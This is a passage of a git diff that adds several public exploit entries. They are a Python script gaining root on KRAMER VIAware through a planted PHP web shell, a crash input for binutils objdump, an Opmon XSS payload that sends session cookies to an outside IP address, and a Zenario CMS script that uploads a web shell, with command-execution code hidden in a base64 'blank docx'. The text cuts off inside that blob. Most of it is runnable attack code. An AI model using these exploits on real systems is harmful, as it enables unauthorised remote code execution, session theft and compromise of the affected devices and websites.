diff --git a/exploits/hardware/remote/50856.py b/exploits/hardware/remote/50856.py new file mode 100755 index 000000000..1110dab82 --- /dev/null +++ b/exploits/hardware/remote/50856.py @@ -0,0 +1,65 @@ +# Exploit Title: Remote Code Execution as Root on KRAMER VIAware +# Date: 31/03/2022 +# Exploit Author: sharkmoos +# Vendor Homepage: https://www.kramerav.com/ +# Software Link: https://www.kramerav.com/us/product/viaware +# Version: * +# Tested on: ViaWare Go (Linux) +# CVE : CVE-2021-35064, CVE-2021-36356 + +import sys, urllib3 +from requests import get, post +urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) + +def writeFile(host): + headers = { + "Host": f"{host}", + "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:98.0) Gecko/20100101 Firefox/98.0", + "Accept": "text/html, */*", + "Accept-Language": "en-GB,en;q=0.5", + "Accept-Encoding": "gzip, deflate", + "Content-Type": "application/x-www-form-urlencoded", + "X-Requested-With": "XMLHttpRequest", + "Sec-Fetch-Dest": "empty", + "Sec-Fetch-Mode": "cors", + "Sec-Fetch-Site": "same-origin", + "Sec-Gpc": "1", + "Te": "trailers", + "Connection": "close" + } + # write php web shell into the Apache web directory + data = { + "radioBtnVal":"""""", + "associateFileName": "/var/www/html/test.php"} + post(f"https://{host}/ajaxPages/writeBrowseFilePathAjax.php", headers=headers, data=data, verify=False) + + +def getResult(host, cmd): + # query the web shell, using rpm as sudo for root privileges + file = get(f"https://{host}/test.php?cmd=" + "sudo rpm --eval '%{lua:os.execute(\"" + cmd + "\")}'", verify=False) + pageText = file.text + if len(pageText) < 1: + result = "Command did not return a result" + else: + result = pageText + return result + +def main(host): + # upload malicious php + writeFile(host) + command = "" + while command != "exit": + # repeatedly query the webshell + command = input("cmd:> ").strip() + print(getResult(host, command)) + exit() + +if __name__ == "__main__": + if len(sys.argv) == 2: + main(sys.argv[1]) + else: + print(f"Run script in format:\n\n\tpython3 {sys.argv[0]} target\n") \ No newline at end of file diff --git a/exploits/linux/local/50858.txt b/exploits/linux/local/50858.txt new file mode 100644 index 000000000..6a75d6a5c --- /dev/null +++ b/exploits/linux/local/50858.txt @@ -0,0 +1,83 @@ +# Exploit Title: binutils 2.37 - Objdump Segmentation Fault +# Date: 2021-11-03 +# Exploit Author: p3tryx +# Vendor Homepage: https://www.gnu.org/software/binutils/ +# Version: binutils 2.37 +# Tested on: Ubuntu 18.04 +# CVE : CVE-2021-43149 + +Payload file + +``` + +%223"\972\00\0083=Q333A111111114111113333<33A $$$\FF)$\80 1114 +\00\80\99\00111111111111111-11111111111111111111111111111111111'111111111111111111 +111111*111111111111111111111111111111111111111111111111111111111111111111111111111*111111111111111111111111 + $%22622FF7FFF11111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111 +1))\FF)$1 1111 + $%22111111111111111111111111111111111.1111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111101111111111111111111111111111111111111111111111111111111111111111111111111111622FF +\00\00\00FFFFFFFFFFFFFFFFFFFFF222CFFFFFF \81 \8D 1111 + $%22622FF7FFFFFFFFF111111111111111111111111111111111111111111111111111111q1111111111111111111111111111111111111 +1))\FF)$1 1111 + $%22622FFFFFDFFFFFFFFFFFFFFFFFFFFF222CFFFFFF \81 \8D 1111 + $%22622FF7FFFFFFFFF11111111111111111,1FF\83 \81 \8D 1111 + $%22622FF7FFFFFFFFFFFFFFF \FF + + \00\80\99\00 1))\FF)$\80 1114 +\00\80\99\0011111111111111)111111111111111111111111111111111111111111111111111111 +1))\FF)$1 1111 + $%22622FFFFFFFFFFFFFFFFFFFFFFFFFFF222CFFFFFF \81 { \8D 1111 + $%22622FF7FFFFFFFFF11111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111 +1))\FF)$1 1111 + $%2262211111111111111111111111111111111111111111111\00\00 +\00111111111111111111111111111111111111111111111FFFFFFFFFFFFFFFFFFFFFFFFFFF222CFFFFFF + \81 \8D 111 + $%22622FFF1111111111111111111FF\83))\FF)$1 1111 + $%22622FFFFFFFFFFFFFFFFFFFFFFFFFFF2E2CF9FFFF \98 \81 \8D 1111 + $%22622FF7FFFFFFFFF1111111111111111111111111111111111111111111111111111111111111111111111111111 +1))\FF)$1 1111 + $%22622FFFFFFFFFFFFFFFFFFFFFFFFFFF222CFFFFFF \81 \8D 1111 + $%22622FF7FFFFFFFFF1111111111111111111FF\83 \81 \8D 1111 + $%22622FF7FFFFFFFFFFFFFFF \FF + + \00\80\99 1))\FF)$\80 1114 +\00\80\99\00111111111111111111111111111111111111111111111111111'111111111111111111 +1111111111111111111111111111111>11111111111d\00\00\00111111111111111111 +111111111111111111111111111111111111111111111111111*111111111111111111111111.1111111111111111111111111111111;111011111111111111111111111111111111111111111111111111\EA111111111111111 + $%22622FF7FFF111111111111111111111111111111111111111111111111111111111111111111111111111111111111.1111111111111111111111$1 +1111 + $%22622FFFFFFF1111111111111111111111111111\BF\BF\BF\BF\BF\BF1111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111!11111111111111'111111111111111111 +111111111111@111111111111111111d\001111 +\0011111111111111111111111111111111111111111111111*1111111111111111111111111111111111111111111111111111111111110111111111151111111111111111111111111111111111111111111111111111)111111111111111111111111111F111111111111111111111111 +1111111FFFFFFFFFFLFFFFFFF11111111 111111111111111111111111111111111 + $%22622FF7FFF111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111P1111111111111111111111111111111111111111111111111111111111111111111111111111111111.11111111111111111111111111111111111111N1111111111111111111111111111111111111111111111111 +1111111111111111111111111111\FF\FF1111111117111111111111111111111111111111111))\FF)$11111111111111111111111111111111111111111111111111111111111111111111111111*111111111111111111111111111111111111111111111111111111111111@1111111111111111111111111111111111111111111111111111\00\00 +\0011111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111M111111R111111111111 +111111111111 111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111 +1))\FF)$1 1I11 + $%22622FFFFFF1FFFFFFFFFFFFFFFFFFFF222CFFFFFF \81 \8D 1111 + $%22622FF7FFFFFFFFF111111111111 +111111111111111111111111111111111111111111111 1))\FF)$1 1111 + $%22622FFFFFFFFFFFFFFFFFFFFFFFFFFF$%22622FFFFFFFFFFFFFMFFFFFFFFFFFFF222CFFFFFF + \81 \8D 1111 + $%22622FF7FFFFFFFFF11111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111FFFFFF + \FF + + \00\80\99\00 1))\FF)$\80 1111 \00\80\99\00a1))\FF)$1 1J11 + $%22@22FF11111FFFFFFFFFFFFFF222$)$ + +``` + +RUN the POC + +# binutils-2.37/binutils/objdump -T -D -x crash_2.37 +ASAN:SIGSEGV +================================================================= +==27705==ERROR: AddressSanitizer: SEGV on unknown address +0x000000000000 (pc 0x000000000000 bp 0x7fffffffdee0 sp 0x7fffffffde38 +T0) +==27705==Hint: pc points to the zero page. + +AddressSanitizer can not provide additional info. +SUMMARY: AddressSanitizer: SEGV ??:0 ?? +==27705==ABORTING \ No newline at end of file diff --git a/exploits/multiple/remote/50857.txt b/exploits/multiple/remote/50857.txt new file mode 100644 index 000000000..178d5264e --- /dev/null +++ b/exploits/multiple/remote/50857.txt @@ -0,0 +1,32 @@ +# Exploit Title: Opmon 9.11 - Cross-site Scripting +# Date: 2021-06-01 +# Exploit Author: p3tryx +# Vendor Homepage: https://www.opservices.com.br/monitoramento-real-time +# Version: 9.11 +# Tested on: Chrome, IE and Firefox +# CVE : CVE-2021-43009 + +# URL POC: + + + +Url-encoded Payload + +%3Cscript%3E%0Aalert%28document.cookie%29%3B%0Avar%20i%3Dnew%20Image%3B%0Ai.src%3D%22http%3A%2F%2F192.168.0.18%3A8888%2F%3F%22%2Bdocument.cookie%3B%0A%3C%2Fscript%3E + +``` +*https://192.168.1.100/opmon/seagull/www/index.php/opinterface/action/redirect/initial_page=/opmon/seagull/www/index.php/statusgrid/action/hosts/filter* + +[search]=%27};PAYLOAD&x=0&y=0 + +*https://192.168.1.100/opmon/seagull/www/index.php/opinterface/action/redirect/initial_page=/opmon/seagull/www/index.php/statusgrid/action/hosts/filter* + +[search]=%27}; +%3Cscript%3E%0Aalert%28document.cookie%29%3B%0Avar%20i%3Dnew%20Image%3B%0Ai.src%3D%22http%3A%2F%2F192.168.0.18%3A8888%2F%3F%22%2Bdocument.cookie%3B%0A%3C%2Fscript%3E +&x=0&y=0 + +``` \ No newline at end of file diff --git a/exploits/php/webapps/50850.py b/exploits/php/webapps/50850.py new file mode 100755 index 000000000..3029740fb --- /dev/null +++ b/exploits/php/webapps/50850.py @@ -0,0 +1,140 @@ +# Exploit Title: Zenario CMS 9.0.54156 - Remote Code Execution (RCE) (Authenticated) +# Date: 04/02/2022 +# Exploit Author: minhnq22 +# Vendor Homepage: https://zenar.io/ +# Software Link: https://zenar.io/download-page +# Version: 9.0.54156 +# Tested on: Ubuntu 21.04 +# CVE : CVE-2021–42171 +# Python3 + +import os +import sys +import json +import uuid +import base64 +import requests + +# Input +if len(sys.argv) != 4: + print("Usage: " + sys.argv[0] + " 'http(s)://TARGET/zenario' 'USERNAME' 'PASSWORD'") + exit(1) + +TARGET = sys.argv[1] +USERNAME = sys.argv[2] +PASSWORD = sys.argv[3] + +## Attempt to log in +### Get cookie +resp = requests.get(TARGET + "/zenario/admin/welcome.ajax.php?task=&get=%5B%5D") + +### Grab the PHP session ID +PHPSESSID = resp.headers['Set-Cookie'].split(";")[0] + +### Authen with cookie +resp = requests.post(TARGET + "/zenario/admin/welcome.ajax.php?task=&get=%5B%5D", + headers={"X-Requested-With": "XMLHttpRequest", "Cookie": PHPSESSID}, + data={"_validate": "true", "_box": '{"tab":"login","tabs":{"login":{"edit_mode":{"on":1},"fields":{"reset":{"_was_hidden_before":true},"description":{},"username":{"current_value":"' + USERNAME + '"},"password":{"current_value":"' + PASSWORD + '"},"admin_login_captcha":{"_was_hidden_before":true,"current_value":""},"remember_me":{"current_value":false},"login":{"pressed":true},"forgot":{"pressed":false},"previous":{"pressed":false}}},"forgot":{"edit_mode":{"on":1},"fields":{"description":{},"email":{"current_value":""},"previous":{},"reset":{}}}},"path":"login"}'}) + +# If login OK +print("Login OK!") + + +## Upload web shell +### Get sync info +resp = requests.post(TARGET + "/zenario/admin/admin_boxes.ajax.php?path=zenario_document_upload", + headers={"X-Requested-With": "XMLHttpRequest", "Cookie": PHPSESSID, "Referer": TARGET + "/zenario/admin/organizer.php?fromCID=1&fromCType=html"}, + data={"_fill": "true", "_values": ""}) + +resp_body = json.loads(resp.text) + +password_sync = resp_body["_sync"]["password"] +iv_sync = resp_body["_sync"]["iv"] +cache_dir_sync = resp_body["_sync"]["cache_dir"] + +### Create blank docx file +file_content = b"UEsDBBQABgAIAAAAIQDfpNJsWgEAACAFAAATAAgCW0NvbnRlbnRfVHlwZXNdLnhtbCCiBAIooAAC\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAC0\nlMtuwjAQRfeV+g+Rt1Vi6KKqKgKLPpYtUukHGHsCVv2Sx7z+vhMCUVUBkQpsIiUz994zVsaD0dqa\nbAkRtXcl6xc9loGTXmk3K9nX5C1/ZBkm4ZQw3kHJNoBsNLy9GUw2ATAjtcOSzVMKT5yjnIMVWPgA\njiqVj1Ykeo0zHoT8FjPg973eA5feJXApT7UHGw5eoBILk7LXNX1uSCIYZNlz01hnlUyEYLQUiep8\n6dSflHyXUJBy24NzHfCOGhg/mFBXjgfsdB90NFEryMYipndhqYuvfFRcebmwpCxO2xzg9FWlJbT6\n2i1ELwGRztyaoq1Yod2e/ygHpo0BvDxF49sdDymR4BoAO+dOhBVMP69G8cu8E6Si3ImYGrg8Rmvd\nCZFoA6F59s/m2NqciqTOcfQBaaPjP8ber2ytzmngADHp039dm0jWZ88H9W2gQB3I5tv7bfgDAAD/\n/wMAUEsDBBQABgAIAAAAIQAekRq37wAAAE4CAAALAAgCX3JlbHMvLnJlbHMgogQCKKAAAgAAAAAA\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAArJLBasMw\nDEDvg/2D0b1R2sEYo04vY9DbGNkHCFtJTBPb2GrX/v082NgCXelhR8vS05PQenOcRnXglF3wGpZV\nDYq9Cdb5XsNb+7x4AJWFvKUxeNZw4gyb5vZm/cojSSnKg4tZFYrPGgaR+IiYzcAT5SpE9uWnC2ki\nKc/UYySzo55xVdf3mH4zoJkx1dZqSFt7B6o9Rb6GHbrOGX4KZj+xlzMtkI/C3rJdxFTqk7gyjWop\n9SwabDAvJZyRYqwKGvC80ep6o7+nxYmFLAmhCYkv+3xmXBJa/ueK5hk/Nu8hWbRf4W8bnF1B8wEA\nAP//AwBQSwMEFAAGAAgAAAAhAJdANEq+AgAAvQoAABEAAAB3b3JkL2RvY3VtZW50LnhtbKSW227b\nMAxA3wfsHwK/t7KdxEmNpkW7dkMfBhTr9gGKLNtCrQsk5bavH+X75q5w3BdbIs0jiiJpXd8eeTHb\n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\nXS5YIWyttIXov6tfXY4